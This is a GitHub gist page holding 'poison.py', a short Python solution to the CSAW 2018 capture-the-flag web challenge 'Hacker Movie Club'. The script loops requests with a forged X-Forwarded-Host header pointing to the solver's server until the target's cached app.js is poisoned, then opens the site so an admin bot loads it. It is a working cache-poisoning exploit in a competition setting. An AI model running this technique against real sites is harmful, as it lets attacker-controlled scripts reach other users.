Created
September 17, 2018 10:33
-
-
Save LuD1161/65b0d588cfbf93a94b64d0c3e76edbed to your computer and use it in GitHub Desktop.
poison.py - Hacker Movie Club ( Web challenge ) CSAW 2018
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from time import sleep | |
| import requests | |
| import webbrowser | |
| X_Forwarded_Host = 'my_server' | |
| while True: | |
| resp = requests.get("http://3fad5c9a76928974bc36ef08fb1dfa2c98e98740.hm.vulnerable.services/cdn/app.js", headers={'X-Forwarded-Host': X_Forwarded_Host}) | |
| print resp.headers | |
| sleep(0.5) | |
| if X_Forwarded_Host in resp.text: | |
| print resp.text | |
| break | |
| # Now we're sure that our entry has been put up in cache | |
| # So, just open the webbrowser, and report so that the admin | |
| # gets our cached page | |
| webbrowser.open('http://app.hm.vulnerable.services/') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment